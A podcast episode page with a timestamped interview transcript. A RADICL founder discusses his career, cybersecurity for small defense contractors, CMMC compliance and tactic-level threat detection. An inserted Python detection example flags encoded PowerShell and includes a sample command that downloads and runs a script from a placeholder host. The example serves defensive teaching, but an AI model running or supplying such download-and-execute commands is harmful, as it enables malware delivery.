Ever wondered how a degree in accounting could lead to a thriving career in cybersecurity? Join us as Chris Petersen shares his riveting journey from Colorado State University to becoming a cybersecurity expert. Initially hesitant to dive into engineering, Chris leveraged his minor in accounting information systems and a golden opportunity at Price Waterhouse to pivot into IT. His story underscores the importance of adaptability and seizing opportunities, offering invaluable insights for anyone contemplating a career shift in the tech industry.
Small and medium-sized businesses (SMBs) in critical sectors often find themselves in the crosshairs of cyber adversaries. Chris and our hosts dissect the pressing cybersecurity challenges these businesses face, especially those in the defense industrial base. Learn about RADICL's mission to democratize enterprise-level security through cloud technology and AI, making it affordable for vulnerable companies. We also discuss how upcoming regulations mandating third-party cybersecurity assessments could change the landscape, ensuring that contractors handling sensitive information are adequately protected.
Finally, we tackle the evolving threats in the defense industry and the necessity for advanced threat detection and attribution. Chris offers an insider's perspective on the methodologies employed to counteract these sophisticated attacks. We also delve into the controversial topic of a national digital ID system, debating its potential to combat identity fraud and deep fakes while navigating the intricate balance between security and privacy. This episode is packed with critical information and actionable insights, making it a must-listen for anyone invested in the future of cybersecurity and digital identity.
https://radicl.com/
Follow the Podcast on Social Media!
Instagram: https://www.instagram.com/secunfpodcast/
Twitter: https://twitter.com/SecUnfPodcast
Patreon: https://www.patreon.com/SecurityUnfilteredPodcast
YouTube: https://www.youtube.com/@securityunfilteredpodcast
TikTok: Not today China! Not today
Speaker 1: How's it going everyone?
00:00:01
So, before we dive into the episode, I really want to say
00:00:06
thank you to everyone that is listening in, that's tuning in,
00:00:09
that's enjoying this content and getting value from it.
00:00:11
I really love that.
00:00:13
That's why I do it. And I really want
00:00:26
to encourage you to please follow and subscribe to the podcast
00:00:28
on whatever platform you are listening or viewing this on.
00:00:31
It really helps out the podcast , it helps out the algorithm, it
00:00:34
helps more people hear this content that you already find
00:00:38
helpful and that they hopefully will as well.
00:00:41
So, if you go ahead and subscribe or follow the podcast
00:00:44
on any platform that you're listening on and please share it
00:00:47
with your friends, that'd be great.
00:00:50
All right, thanks everyone.
00:00:51
Let's get into the episode.
00:00:52
How's it going?
00:00:54
Chris, it's great to have you on the podcast.
00:00:57
I'm really looking forward to our conversation today.
00:01:00
Speaker 2: Yeah, thanks, Joe. Great to be here.
00:01:17
Speaker 1: Yeah, absolutely. So, Chris.
00:01:18
You know, I start everyone off the same way.
00:01:20
You know I remember when I was making that jump and all that I
00:01:25
needed to hear was that someone else did it from a similar
00:01:28
background, so that I could tell myself, like, hey, this is
00:01:31
possible.
00:01:32
You know, this is something that I can actually go down and
00:01:35
achieve.
00:01:36
So what's your story?
00:01:38
You know, what made you interested in IT?
00:01:40
What made you, you know, go down this path?
00:01:42
00:01:45
Speaker 2: Yeah, I mean I guess I had a pretty non-traditional,
00:01:47
circuitous route to cybersecurity, certainly, and
00:01:51
even IT.
00:01:51
I graduated from Colorado State University with an accounting
00:01:57
degree.
00:01:57
I had wisely chosen to pick up a minor in
00:02:04
accounting information systems.
00:02:05
That was, I'd say, one of the few good choices I
00:02:10
made in college, but it ended up serving me well.
00:02:13
So I managed to get hired at Pricewaterhouse.
00:02:16
There's a pretty good story behind that.
00:02:18
You know, I got into a really good firm.
00:02:24
00:02:25
I got there because of that concentration.
00:02:27
They needed somebody to help one of their clients deploy
00:02:29
technology to replace a mainframe application.
00:02:31
They said, hey, you're accounting, you've got systems,
00:02:34
we'll train you and see if you can do this.
00:02:36
And it turned out I was pretty good at it.
00:02:38
So I did that for about a year.
00:02:40
So I got trained up pretty quick and learned on
00:02:44
the job.
00:02:48
Um, and then actually I went back to the
00:02:50
financial audit side for a year, found out that wasn't really all
00:02:53
that appealing to me and then learned about their IT audit
00:02:57
practice and began to pursue that, and that's what, I
00:03:01
think, got me more into the audit side and more onto the IT
00:03:05
side, and that then kind of really propelled me more along
00:03:09
the IT and cybersecurity path. And again, I was writing software and
00:03:14
tooling to try to automate things that I wanted to automate
00:03:16
, and I had a knack for that as well on the software side.
00:03:19
And you know, I think just those early experiences, just
00:03:24
you know, being asked to go learn, figure stuff out, and
00:03:27
being presented with the opportunity to get hands-on
00:03:29
in technology, is what really shaped my career.
00:03:36
Speaker 1: That's really fascinating.
00:03:37
You know, when you were getting your degree, did you see that
00:03:42
specialty or that focus of information systems as the
00:03:46
future?
00:03:46
You know, did you see that and say I could see, you know,
00:03:49
computers and IT systems becoming a thing in the future?
00:03:53
I'm going to go down this route , or was it kind of more
00:03:55
happenstance?
00:03:58
Speaker 2: Yeah, I mean it was.
00:03:58
You know a little bit of both.
00:04:00
I mean I'm kind of.
00:04:01
I mean I was always.
00:04:02
I always... I was definitely a heavy leverager of,
00:04:07
you know, technology.
00:04:08
I sat around computers and things like that when I was
00:04:11
younger.
00:04:12
So I was a more advanced tinkerer than most, and I chose
00:04:19
accounting because, honestly, I was too lazy to do all the hard
00:04:21
work in engineering.
00:04:22
I started at CSU as an engineering major and I got
00:04:27
a look at years two and three.
00:04:29
It's like, oh my gosh, this is going to be a lot of work.
00:04:31
I'm going to have to really buckle down and study, um, and
00:04:34
then I said, I don't want to do that. But I did, I think,
00:04:43
see a little bit of the writing on the wall in
00:04:45
terms of where systems were going and that technology was going to be
00:04:49
driving the future economy and the future of business.
00:04:53
I did make a choice to go pursue that concentration for
00:04:57
that reason, and I had an affinity for technology.
00:05:01
Speaker 1: Oh yeah, when I was in college I had a friend that
00:05:05
went down the engineering path.
00:05:06
I think it was like the mechanical engineering path and
00:05:10
you know he would talk to me about, like the math classes and
00:05:13
the physics classes that he'd have to take and, like man, like
00:05:16
I enjoyed calc one, but I don't know if I'd enjoy, like you know,
00:05:20
five steps above that.
00:05:21
Um, it's, it's.
00:05:23
It's an insane amount of work and I feel like it's really hard
00:05:26
to kind of figure out what that work is going to be like until
00:05:30
you get into it.
00:05:31
But it's just, it's an insane amount of work.
00:05:34
You're nonstop studying.
00:05:38
Speaker 2: You are.
00:05:38
Yes, it's a different level of, you know... especially when the
00:05:42
schools, at least CSU, they kind of weed out
00:05:49
the faint-hearted by having physics at 8 in the morning, and so if
00:05:55
you're not willing to get up at 8 in the morning and go do physics,
00:05:58
you probably shouldn't be pursuing engineering, and so
00:06:01
that did also help to weed me out.
00:06:03
Yeah, yeah, thinking back... I can't have my boys watch this
00:06:09
episode.
00:06:10
That's not good, I'm saying too much.
00:06:10
Speaker 1: Yeah, thinking back, it was, uh,
00:06:15
that is interesting.
00:06:16
All those hard classes were pretty early in the morning too.
00:06:20
For my, uh, program, you know, I tried to go pre-med at first,
00:06:25
right, so you have to take, like, chemistry and physics and
00:06:27
you know, calculus and all those fun classes, and all the
00:06:32
hard ones were in the morning.
00:06:34
It seemed like 8 am, 7 am, there was no breaks.
00:06:38
I think that that helped.
00:06:40
That definitely helped weed me out.
00:06:41
Speaker 2: Now that you bring that up, I think that
00:06:44
definitely helped. I think it's deliberate, probably smart,
00:06:47
right? It's kind of like, if you're not willing, you know,
00:06:49
now to go do this, you know, yeah, like four more years of
00:06:52
this.
00:06:52
Speaker 1: So you know, buckle up, right? Yeah, if you're not
00:06:56
willing to do it now, then you're definitely not going to
00:06:59
be willing to do the hard stuff when we actually get to it. Yeah,
00:07:02
that's right, that makes a lot of sense.
00:07:04
So, uh, you know, talk to me about that
00:07:08
opportunity of being handed you know new things to figure out?
00:07:12
Right, were you?
00:07:13
Were you nervous, were you going through imposter syndrome
00:07:17
at the time?
00:07:17
Because I remember when I was, you know, handed new things to
00:07:22
figure out for myself, I felt like I was you know an imposter.
00:07:28
Surely, in this project they're going to figure out, I'm not
00:07:32
the person that they should have hired, you know, and I'm going
00:07:34
to be shown the door and things like that.
00:07:36
Right, did you go through something similar or not?
00:07:40
Speaker 2: Yes, yes, in multiple different ways, you know for
00:07:51
sure.
00:07:51
I mean we just started.
00:07:52
I mean, I was showing up brand new.
00:07:53
When you work for a firm like Pricewaterhouse, you know,
00:07:54
the expectations are pretty high, um, and you know, I think
00:07:57
it's like I kind of had an interesting path in there, but
00:08:00
so I had to kind of overcome that and earn my way along, you
00:08:03
know, at a firm like that, and so I had a bit of, I'd say,
00:08:11
insecurity or imposter syndrome for a while until I got my
00:08:13
feet under me in that early phase.
00:08:14
But yeah, I mean, what I really loved about that
00:08:16
experience and some of this was because the field was very new.
00:08:21
You know, IT audit, EDP audit IT security was a discipline that
00:08:24
built on IT audit.
00:08:25
There really wasn't internet security at that time.
00:08:28
I was kind of right there when IT audit was becoming internet
00:08:32
security and corporate America was connecting their networks to the
00:08:36
internet or thinking about doing that, trying to figure out
00:08:38
is this a good idea or not?
00:08:39
Hey, there's a thing called a firewall.
00:08:41
Should we get a firewall?
00:08:43
So I was kind of there at that time, and so I was often
00:08:51
asked to go in and assess things or figure stuff out.
00:08:53
You could do a database security assessment or
00:08:55
application security assessment or a general controls review, and like,
00:08:59
here's your list of things to go look at.
00:09:01
Sometimes there was something put down before you and some structure
00:09:04
there, or we didn't have that yet.
00:09:06
So go to Barnes & Noble and go buy a book and figure it out and
00:09:09
show up the next day as an Oracle audit expert.
00:09:13
And so I had to go do those things and, on the fly, read,
00:09:20
learn and try to show up with some credibility in front of people who were
00:09:26
doing things like Oracle DBAs, as that was their job and
00:09:30
profession.
00:09:31
So it was a lot of pressure.
00:09:33
I guess I was pretty good at picking things up pretty quickly
00:09:37
and synthesizing knowledge, and that accounted for a lot of it.
00:09:43
But yeah, a lot of times it was like that, right,
00:09:46
going in just not knowing if somebody could call my bluff and
00:09:48
just be like, hey, yeah, you really don't know what
00:09:52
you're talking about.
00:09:52
It's pretty clear, let me, let me school you up.
00:09:55
But yeah, often, even when they knew that... yeah, a lot of
00:09:58
you know, people at best only kind of know; like, yeah, you've
00:10:00
figured stuff out yourself and you're doing a job,
00:10:03
so there's also some grace given.
00:10:09
Speaker 1: Yeah, that's... it's an interesting skill to have and develop.
00:10:12
Right? You're being paid to be the SME, but you're
00:10:18
not really the SME, yeah, and you're trying to figure things
00:10:21
out, right, and you can kind of get by with using the right
00:10:25
words, using the right terminology and whatnot right.
00:10:28
But when it comes to hands-on keyboard technical perspective,
00:10:32
you may need a little bit of assistance and whatnot.
00:10:35
And it's an interesting environment, right, because I
00:10:40
remember when I was starting to go, you know, on client calls to
00:10:46
different federal agencies I mean I was early on in my career
00:10:50
, I didn't know what I didn't even know. Trying to be the SME
00:10:55
in that environment.
00:10:56
I mean, you have the guy who wrote the vulnerability scan software
00:11:00
that you're using right there at the desk, and you're saying,
00:11:04
you know, contradicting things
00:11:06
and it's, um, it's definitely a learning experience.
00:11:10
Did you, do you look back at those skills that you, you know,
00:11:16
learn working under that pressure and do you think that
00:11:18
it benefits you now?
00:11:19
How?
00:11:20
How has it benefited you or changed your mentality towards
00:11:25
you know, adverse conditions and new problems that are coming up
00:11:29
in the modern world within your new you know company and role?
00:11:35
Speaker 2: Yeah, I mean it definitely saved me.
00:11:36
I think it helped instill in me a high, you know, high
00:11:41
sense of self-efficacy, you know, kind of the notion that
00:11:44
I believe I can figure stuff out, and so I was forced to do
00:11:50
that and I did.
00:11:51
I think, just generally speaking for people early in
00:11:58
their career, I think just that philosophy of figure it out,
00:12:01
there's so much out there; there's never been a better
00:12:06
resource of knowledge and intelligence than there is today.
00:12:11
And so, you know, be curious, go learn, figure stuff out, just
00:12:16
be willing to just go out there and take a risk as well, push
00:12:21
the envelope.
00:12:21
But yeah, for me I think that instills a lot of high
00:12:25
self-efficacy and also just the notion that what needs to be figured
00:12:27
out, I can figure out.
00:12:29
And I've been a lifelong learner in my profession.
00:12:32
Through all those other jobs that I had, I was always being
00:12:35
pushed forward in roles I wasn't really qualified yet to do and
00:12:39
always, you know, building competence, and the same thing
00:12:44
when I, you know, founded LogRhythm, and
00:12:48
you know, that was every single year being pushed to grow and
00:12:51
to scale and to pick up new skills, whether on the technical
00:12:53
side or leadership side, managerial side, strategy.
00:12:56
Um, you know, it was just... you have to figure stuff out.
00:13:01
Now I'm doing that same thing at RADICL as well, and it's fun.
00:13:09
It's challenging, stressful at times.
00:13:11
You know, you're not just doing the things
00:13:12
you already know how to do every day, and there's some real stress, and some
00:13:13
days the stress gets to me more than others, but I'm always glad
00:13:17
that I continue to grow and learn.
00:13:22
Speaker 1: So talk to me about RADICL.
00:13:23
You know what do you guys focus on?
00:13:26
What's the area of expertise within the security world?
00:13:43
Speaker 2: Yeah, our mission is to protect the defense industrial base and US critical
00:13:45
infrastructure.
00:13:47
That's the fundamental goal, that's the mission, and for us,
00:13:53
we're going about that by trying to secure the SMB segment.
00:13:57
Smaller companies, these companies that serve
00:14:03
defense supply chains, serve critical infrastructure, they
00:14:06
are being actively targeted by nation-state threats, APTs, and I
00:14:11
believe a lot of them are likely, you know, actively
00:14:14
compromised.
00:14:14
And because this is nation-state espionage, it's
00:14:19
also, it's also cyber warfare and it's posturing and it's
00:14:23
preparing for future conflicts.
00:14:25
And these companies, they're involved in it.
00:14:30
They typically have not had the defensive arsenal and
00:14:37
capability set to actually defend themselves against that
00:14:39
class of adversary, due to cost and complexity.
00:14:42
So we're trying to bring very advanced, more like enterprise,
00:14:46
big-bank-grade cybersecurity defenses to this segment.
00:14:52
And so for us, that is, you know, managing their attack
00:14:57
surface, shrinking it across time, and then it's also
00:15:00
handling their threat detection and incident response capabilities,
00:15:04
making sure that threats don't go unseen, and when they are seen, they
00:15:08
can investigate and also contain any damage and respond very,
00:15:10
very quickly, and trying to do all of that in a way that's easy
00:15:17
for them to consume and at a price point that they can actually
00:15:19
afford to pay.
00:15:22
Speaker 1: Yeah, it's a fascinating area because it's
00:15:28
often not even looked at, not even thought about.
00:15:30
You know, these really small, tiny companies that
00:15:35
don't have the budget to pay for, you know, a solution like
00:15:39
CrowdStrike or Splunk, right, or whatever it might be.
00:15:43
Uh, you know, how are they protecting themselves? Because
00:15:48
you know they, they may be a small business and they have one
00:15:50
or two government contracts and those one or two government
00:15:54
contracts might be designing, you know, the radar system for a
00:15:57
nuclear sub.
00:15:57
It's, it's interesting what the government will trust with
00:16:03
smaller businesses, you know, to do for them and it makes sense
00:16:06
why they do it.
00:16:07
Right, you kind of want to disperse out these different
00:16:11
systems and have different manufacturers and different R&D
00:16:14
processes and whatnot.
00:16:17
But at the same time, it does open you up to risk, because I
00:16:21
remember actually reading an article where, you know, the FBI
00:16:26
identified that, you know, a foreign adversary was
00:16:29
infiltrating the power grid via a small business.
00:16:33
It was literally this guy and his wife, you know, owned and
00:16:37
ran this business and he would go out and work on the power
00:16:40
grid at a substation that was, you know, nearby his place of
00:16:45
residence.
00:16:46
Even, right, it's in the middle of the country in the middle of
00:16:48
nowhere, you know, like Montana or something like that, right,
00:16:51
and they identified that, you know, the country's power grid
00:16:54
was being infiltrated by this small business.
00:16:56
Well, this guy doesn't know anything about cybersecurity.
00:16:58
Like, when the FBI showed up at his door, he was confused as to
00:17:02
, you know, like, how is this even possible?
00:17:05
You know, like, I bought a laptop from Dell, it was a new
00:17:07
laptop, I don't know what to tell you, I hook it up, like this
00:17:11
is what I do. And, um, you know, he couldn't
00:17:15
even wrap his head around what it was that was going on.
00:17:18
And so it's a sector of the market that, in my opinion, is
00:17:24
often overlooked, you know, in terms of cybersecurity, but it's
00:17:28
a place where we're probably the most vulnerable.
00:17:33
Speaker 2: Agreed, yeah, and I've, you know, I've been
00:17:35
concerned about that for a long time and that's been, you know,
00:17:38
top of mind for me. You know, it was also the impetus
00:17:41
for starting LogRhythm as well, kind of that same concern, but,
00:17:50
yeah, it's overlooked.
00:17:51
It is overlooked.
00:17:52
I think it's overlooked in terms of the vendor side, you
00:17:56
know, because the challenge with this market is it's hard to
00:17:59
make money there, right.
00:18:00
And for us, that's the fundamental challenge that we have. I think
00:18:03
we can do it because technology has evolved in a way where we
00:18:05
can get to a solution that can be affordable and also high
00:18:10
quality, based on cloud and AI and just the modern tech
00:18:17
situation.
00:18:18
But in the past that hasn't been possible.
00:18:21
So, from the vendor perspective , they have often been
00:18:23
overlooked.
00:18:24
The government has not been overlooked and they've been very
00:18:27
concerned for a while.
00:18:28
There are various clauses, key clauses.
00:18:30
You know, DFARS 7012 is a key one, where they're supposed to
00:18:34
comply with NIST 800-171, which is a pretty rigorous compliance
00:18:37
framework.
00:18:37
The challenge has been there's not been enforcement of it.
00:18:41
And there's self-reporting and companies can self-assess every
00:18:47
three years and there's a score, but that score is not necessarily
00:18:51
really evaluated in terms of their ability to contract
00:18:56
currently, and so there isn't an economic incentive to invest in
00:19:01
cybersecurity, where there hasn't been one.
00:19:04
One is coming with the Cybersecurity Maturity Model
00:19:07
Certification process, where that will actually be a compliance
00:19:12
methodology that will have teeth and independent third-party
00:19:17
assessments and that will hopefully level the playing
00:19:24
field so that all companies need to invest the appropriate
00:19:27
resources to actually be secure if they're handling what's
00:19:31
called controlled unclassified information, CUI, which is the
00:19:36
very sensitive stuff that the government must make sure gets
00:19:39
protected.
00:19:41
So there's been focus on it.
00:19:43
It's just the challenge has been government moves slowly, um
00:19:46
, there's no enforcement model and these are small companies.
00:19:50
They've got businesses to run, they've got employees to pay and
00:19:53
they're already working on narrow margins, and so they
00:19:57
can't.
00:19:57
You know, they can't justify the spend on cybersecurity
00:20:00
because there's no economic benefit.
00:20:01
Um, and others could just say I'm not going to spend it and
00:20:05
therefore I'll underbid you on price, right.
00:20:07
So what CEO is going to say, I'm going to allocate 5% of my
00:20:11
budget to cybersecurity, when a competitor's CEO is not going to do that?
00:20:15
Now everything I do is more expensive than theirs, and so it's
00:20:20
kind of an economic model that is, I think, broken right now.
00:20:25
That is ultimately driving the underspend and under-delivery of
00:20:31
cybersecurity in this segment.
00:20:34
Speaker 1: Yeah, that makes sense.
00:20:35
Was there an experience you know previously in your career
00:20:40
that you know kind of opened you up to this whole problem within
00:20:45
the sector?
00:20:49
Speaker 2: Well, I mean, you know.
00:20:50
I mean I'm a patriot.
00:20:55
I never served myself in the military.
00:20:59
My grandfather served, my dad served and I, you know I love
00:21:05
our country.
00:21:05
You know the country is not perfect.
00:21:08
We've got things to go work on, as does every nation, but I
00:21:13
believe it's a great nation and want to protect it.
00:21:17
And so that's really the root of it.
00:21:20
It's me wanting to help serve my nation through the skills
00:21:29
that I have, the talents that God's given me.
00:21:33
Speaker 1: Yeah, that's so fascinating, right?
00:21:35
Because it's fascinating because, you know, at one point
00:21:39
in time, right, I wanted to go into, like, the federal sector
00:21:43
and work for different agencies and whatnot.
00:21:45
It never panned out for me for one reason or another, right,
00:21:50
like there's a million reasons why you can be disqualified from
00:21:54
these processes.
00:21:55
And it was always so very frustrating to me, right,
00:21:58
because I was told at one point in time oh, you're too young,
00:22:01
you got to wait until you're 30, right, and my response was you
00:22:05
do understand that, like, I'm literally willing to hop on a
00:22:08
plane to go to Afghanistan right now.
00:22:10
Like, right now, if you tell me where to show up, I'll go, but
00:22:14
when I'm 30, I'll probably have kids, I'll probably be married,
00:22:18
there's no way I'm hopping on that plane.
00:22:19
Use me now.
00:22:23
It never really panned out, for one reason or another, probably
00:22:26
for the better, I guess.
00:22:28
But it's interesting for me to see how people you know get into
00:22:34
this world, right, because you're kind of in a quasi space
00:22:37
where you're kind of, you know, one foot in one
00:22:41
world, one foot in the other world, and you're trying to help
00:22:45
both worlds, I guess.
00:22:51
Speaker 2: Yeah, yeah, I mean, indeed, I think, people in cybersecurity generally...
00:22:53
I mean it's kind of, you know, it's cops versus
00:22:55
robbers, a little bit right.
00:22:56
It's kind of good guys versus bad guys, and so I think
00:23:00
a lot of us feel we're in it because, you know, we want
00:23:03
to help protect and, and, you know, fight back.
00:23:08
Um, there are adversaries and threats out there that are
00:23:10
seeking to do harm, whether that's at a nation-state
00:23:14
level or it's ransomware that might jeopardize a family-run
00:23:20
business that's been around for 100 years.
00:23:22
10, 20, 100 employees, all their paychecks. None of that's good.
00:23:28
I think a lot of folks in this industry care about that and
00:23:32
want to just get in
00:23:33
the way of those, those threats.
00:23:37
Speaker 1: So how are you able to create a solution that is
00:23:42
cost effective for these smaller businesses to use?
00:23:45
That, you know, provides, uh, these advanced capabilities?
00:23:49
The reason why I ask is because I'm over here, I'm looking at
00:23:52
my CrowdStrike renewal and I mean it's an arm and a leg right
00:23:57
and they offer similar stuff, but it's not geared towards
00:24:02
smaller businesses.
00:24:03
I remember when I was working for a much smaller company,
00:24:07
somewhere around 50 people, and we had government contracts, I
00:24:12
guess very naively, you know, approached my VP saying, hey,
00:24:16
we should get something like CrowdStrike on our machines.
00:24:19
And you know whatnot.
00:24:20
He looked at the pricing.
00:24:21
He's like, hey, this is like double our IT budget.
00:24:24
You know, like, we can't do this.
00:24:29
Speaker 2: Yeah, now that is a fundamental challenge.
00:24:31
So part of it is we are CrowdStrike partners; we work
00:24:34
with CrowdStrike and CrowdStrike has programs that align for the
00:24:40
SMB.
00:24:40
So that helps us out, helps the customers out.
00:24:43
But I think, to get it right in this particular segment, it
00:24:48
starts with, one, making it easy.
00:24:50
It has to be easy to adopt, rapid to adopt, and part of that
00:24:56
is we can't assume that they've got a bunch of people on their
00:25:01
team who want to spend time doing security or even IT, and
00:25:05
so we've got to take it off their plate.
00:25:06
And that's part of what we've built.
00:25:08
And so we've built a platform that allows us to become
00:25:13
seamlessly their security operations team as well as their
00:25:16
compliance operations team, so we have a compliance side as
00:25:19
well, and so through our platform, we are able to drive
00:25:25
their attack surface management process, right.
00:25:27
So we are scanning for vulnerabilities on their behalf,
00:25:30
identifying configuration weaknesses.
00:25:32
We're doing security awareness training.
00:25:34
We're just delivering all of that to them through our
00:25:37
platform and helping them, just over time on the ASM side,
00:25:42
shrink the attack surface, where all they have to do is just
00:25:46
patch the things we tell them to patch across time, and we can dole
00:25:49
that out in bite-sized chunks so we're not overwhelming them.
00:25:55
On the threat side, we're the ones that are monitoring
00:25:59
anything that CrowdStrike would tell us about.
00:26:02
We're also pulling other data from sources like Office 365 and
00:26:06
Google Workspace and running our own threat analytics against it.
00:26:09
If we see something, we triage it, we investigate.
00:26:13
If there's an incident, we then manage the response process.
00:26:16
We pull the customer in if we need to, through our platform, by
00:26:20
tasking them to do certain things with clear guidance, and
00:26:26
in SMBs, that person being tasked is often an MSP they use to run
00:26:30
their IT.
00:26:30
Our platform allows us to task either the MSP or the internal
00:26:35
IT and also keep their CEO in front of everything going
00:26:39
on, and so that's how we've approached this.
00:26:42
It's kind of this platform-led delivery where we can become
00:26:47
that team seamlessly, high transparency, where very quickly
00:26:52
it's in place.
00:26:53
I mean, we can go and deploy within a day, we're collecting data,
00:26:58
we've got visibility and we're monitoring and we're beginning
00:27:01
to identify vulnerabilities and beginning to work on our plan to
00:27:04
shore those up across time.
00:27:05
And the reason we can do that more affordably than in the past
00:27:13
is we know a lot about security analytics.
00:27:18
That's my background
00:27:19
at LogRhythm.
00:27:20
My co-founder is my brother.
00:27:22
He was employee 25 there.
00:27:24
We know how to build platforms that allow us to better use data,
00:27:26
both for detection as well as workflow automation.
00:27:28
00:27:32
As you can imagine, we're building a lot in our backend
00:27:36
platform that allows us to unleash the potential of data.
00:27:40
It also allows us to unleash the potential of AI as well, to
00:27:44
then increasingly automate things that humans have to do
00:27:48
today.
00:27:48
That is the technical side of how we get to a hyper-efficient
00:27:55
scale that allows us to have a very affordable price point.
00:27:59
Ultimately, AI is taking over more and more of the things that
00:28:04
historically had to be done by a human operator.
00:28:12
Speaker 1: Yeah, that's really interesting.
00:28:14
It seems like that's probably the only way that you can really
00:28:18
penetrate into this market and really help them out is being
00:28:22
able to augment a huge portion of that IT responsibility for
00:28:28
that company.
00:28:29
That makes a lot of sense.
00:28:31
Have you, you know, out of curiosity, have you seen an
00:28:35
increase of either attacks or type of attacks against you know
00:28:41
, some of these smaller companies in correlation to
00:28:44
other world events, right?
00:28:45
So you know I'm thinking of, you know, different tariffs that
00:28:48
might be imposed on China or the Ukraine war that's going on,
00:28:52
right?
00:28:52
Did you see an increase of these kinds of attacks?
00:28:56
Even you know preliminary attacks, right?
00:29:00
Because?
00:29:00
I ask because before Russia invaded Ukraine the second time
00:29:05
here, you know, months beforehand they were attacking
00:29:09
Ukraine and, you know, trying to cause different havoc with
00:29:12
different cyber attacks before an actual kinetic attack
00:29:16
occurred.
00:29:17
Speaker 2: Yeah, yeah, I mean it's hard to
00:29:19
say empirically that we have seen an increase in frequency.
00:29:26
We have certainly seen an increase in the targeted tactics.
00:29:31
One of the things that we do, because we serve the defense industrial
00:29:35
base, is we tie into various intelligence channels and we
00:29:40
have noticed tactics that are emerging that are being used by
00:29:47
various adversary actors to target and penetrate this class of
00:29:51
company.
00:29:52
We then go hunt for any IOCs for those given tactics, and
00:30:02
that's one thing.
00:30:03
We have seen more of those emerge recently around
00:30:09
geopolitical events.
00:30:10
I think that will only continue.
00:30:14
Speaker 1: So I think one major question that the industry is facing is
00:30:20
you know, once you've been breached or attacked in a
00:30:24
certain way, how are you going to ensure that the attackers are
00:30:28
out of the system?
00:30:28
Is there a way that you could potentially walk me through how
00:30:34
that happens, like how you can, you know, provide some sort of
00:30:38
clarity around that, because that's even a difficult question
00:30:42
for me and I'm in the industry.
00:30:43
But a friend of mine who was a director at a company said that
00:30:48
they were recently breached, and his first question to me was
00:30:52
how do I know that they're even gone?
00:30:54
You know, like I don't know right, and it's a difficult
00:30:58
question to answer.
00:31:01
Speaker 2: It is, and so, yeah, we are doing this.
00:31:02
It's not always possible, but if we are able to identify a
00:31:09
certain tactic or a tactic that is either successful or
00:31:13
unsuccessful, that we might need to manually hunt for on an
00:31:17
occasion, we can take the learnings from actually an
00:31:25
active incident or a prior incident, and we can instrument those
00:31:31
learnings in detection rules and CrowdStrike is a very capable
00:31:37
detection engine on the endpoint and so we develop our own
00:31:42
bespoke threat detection rules that will leverage the
00:31:46
intelligence gained through threat hunting or incident
00:31:49
response efforts, and we'll do the same in our own proprietary
00:31:54
detection pipeline, which is analyzing other forms of data,
00:31:57
to take this visibility beyond the endpoint.
00:31:59
So that's a big part of what we strive to do whenever possible
00:32:05
is we have a step in our sequence called
00:32:10
resiliency, and so in our workflow, in our virtual SOC,
00:32:15
resiliency is where we take those learnings and we would try
00:32:18
to put things in place.
00:32:19
Things that would trigger
00:32:21
if you ever saw that same tactic, you know, employed again,
00:32:27
or a similar indicator emerged in the environment that might
00:32:30
point to the fact that the threat did leave something behind. Because that's
00:32:34
a challenge with these very advanced threats.
00:32:40
If they are allowed to get in and stay in, they will leave
00:32:44
behind backdoors that might awaken six months, nine months
00:32:48
later, and it would be hard to suss out if they go live again.
00:32:52
But the things that we learn, though, can at least help us
00:32:57
maybe find an indicator that starts to peek out if that threat
00:33:02
becomes active again in the environment.
00:33:06
Speaker 1: Hmm, are you potentially at this point with
00:33:11
enough data and I'm not saying that you have enough data or
00:33:14
anything like that, right, but when you see an attack occur in
00:33:19
an environment and you get it out of the environment and
00:33:21
you're creating those rules, are you able to potentially even
00:33:27
adjust the attack parameters and say, oh okay, they might tweak
00:33:32
it like this if they try again, or they may adjust.
00:33:35
You know this thing over here.
00:33:37
Whatever it might be, are you also making those adjustments up
00:33:41
ahead to make future attacks even more significantly
00:33:45
difficult for the attacker?
00:33:47
Or maybe I'm just spitballing, right, like I don't know what
00:33:51
I'm talking about.
00:33:53
Speaker 2: Yeah, no, when possible we will.
00:33:55
So we're generally trying to detect the general tactic and
00:34:02
patterns we might observe in data that would indicate that
00:34:05
that tactic is in use versus a very specific IOC which across
00:34:11
time might change or might be different in a different
00:34:14
environment.
00:34:15
And so those
00:34:19
rules we're trying to build are more at a tactic level, which should
00:34:25
be broader in nature and allows us to detect a similar method of
00:34:31
attack going forward, regardless of the environment or
00:34:35
the specific technical details of the instance of that attack.
00:34:41
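To make the tactic-versus-IOC distinction concrete, here is a minimal, hypothetical sketch in Python. It is not RADICL's or CrowdStrike's actual rule logic; the rule names, field names, and sample events are invented for illustration. The point is that a tactic-level rule flags encoded or hidden PowerShell execution in general, so two very different payloads still trip the same detection.

```python
import re

# Hypothetical tactic-level rule: flag encoded/hidden PowerShell execution
# in general, rather than matching one specific payload, hash, or URL (an IOC).
SUSPICIOUS_POWERSHELL = re.compile(
    r"powershell(\.exe)?\s+.*("
    r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}"   # base64-encoded command
    r"|-w(indowstyle)?\s+hidden"                  # hidden window
    r"|-nop\b"                                    # no profile
    r"|downloadstring\("                          # in-memory download cradle
    r")",
    re.IGNORECASE,
)

def matches_tactic(event: dict) -> bool:
    """Return True if the event's command line matches the broad tactic pattern."""
    return bool(SUSPICIOUS_POWERSHELL.search(event.get("command_line", "")))

# Entirely made-up events: two different payloads, same underlying tactic.
events = [
    {"host": "ws-01", "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIABOAGUAdwAtAE8AYgBqAA=="},
    {"host": "ws-02", "command_line": "powershell -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"host": "ws-03", "command_line": "notepad.exe report.txt"},
]

for e in events:
    if matches_tactic(e):
        print(f"ALERT [{e['host']}]: encoded/hidden PowerShell tactic observed")
```

A real detection pipeline would layer many such rules, map them to frameworks like MITRE ATT&CK, and tune them against legitimate admin activity to keep false positives down.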
Speaker 1: Yeah, that makes sense.
00:34:44
Well, have you potentially seen different attack
00:34:47
attributes, right, or methodologies that kind of
00:34:51
correlate to a nation-state actor?
00:34:53
The reason why I say this right or ask this question is because
00:34:57
you know a lot of the times when a report's released about
00:35:00
an after-action event, right, a breach
00:35:05
happens of some, you know, situation and they always
00:35:12
tend to leave out you know the attributed nation states that
00:35:16
they believe it came from or anything like that.
00:35:18
And in security, you know, I still feel like there's
00:35:22
different techniques that Russia would use versus the US or
00:35:28
versus China or versus Iran.
00:35:29
There's different methods of doing these things and these
00:35:32
different nations.
00:35:33
They have different priorities and different attack
00:35:37
methodologies.
00:35:37
Right, like where Russia will just hack into the power grid
00:35:41
